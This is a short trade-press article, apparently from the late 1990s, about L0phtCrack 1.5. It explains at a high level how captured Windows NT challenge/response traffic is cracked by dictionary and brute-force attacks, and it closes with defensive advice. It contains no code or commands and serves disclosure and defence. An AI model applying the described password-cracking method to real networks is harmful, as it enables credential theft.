By Al Berg
Unlike the original version of L0PHTCrack, the new version does not require an attacker to have physical access to a server's console to obtain valid usernames and passwords. Using a network analyzer, an attacker can capture packets containing the challenge/response sequence used by Windows NT to authenticate users and feed these into the L0PHT program, which can spit out both usernames and passwords.
The L0PHT group delights in finding and exposing flaws in Microsoft Windows NT and other networking products and bringing those flaws to the attention of vendors and the public in an effort to improve computer security.
Once the password and username packets have been intercepted, L0PHTCrack takes a two-step approach to decrypting the passwords. First, a dictionary attack is made in which words in a user-supplied text file are encrypted and compared to the encrypted NT passwords. If the encrypted word matches the password hash, the password has been found. Passwords that don't appear in the dictionary file are attacked using a brute-force attack in which all possible combinations of characters are encrypted for each password until a match is found.
Dictionary attacks are performed extremely quickly: The L0PHT claims that a 200MHz Intel Corp. Pentium Pro can extract 100 passwords using an 8MB dictionary file in less than a minute. Brute-force attacks take much longer--10 passwords can be forced in about 26 hours, assuming that the passwords all use alphabetic characters only.
L0PHTCrack takes advantage of a weakness in the Windows NT password-encryption scheme, caused by Microsoft's desire to maintain backward compatibility between NT and earlier products such as Windows and Windows 95. The earlier products use a weaker encryption scheme to secure passwords during the logon process than NT.
L0PHTCrack 1.0 required an attacker to gain Administrator access to the system console. Microsoft quickly responded with a security feature that prevents even the Administrator from dumping out the required files at the console. L0PHTCrack 1.5 defeats this patch handily. Microsoft also issued a fix to stop "LAN Manager-style" passwords from being used.
According to the hackers who created L0PHT 1.5, you can protect servers from attack in a number of ways. First, use firewalls and routers to build walls between your networks and between your intranets and the Internet to prevent easy access to the conversations between servers and clients. Second, don't allow users with Administrator-level access to log in to servers over the network. Third, be sure to set file and directory permissions so that compromised passwords don't give an intruder access to more data than necessary. Finally, monitor your systems for unusual activity.
Contributing Editor Al Berg is a CNE and director/strategic technologies at NETLAN Inc., a networking and integration company in New York.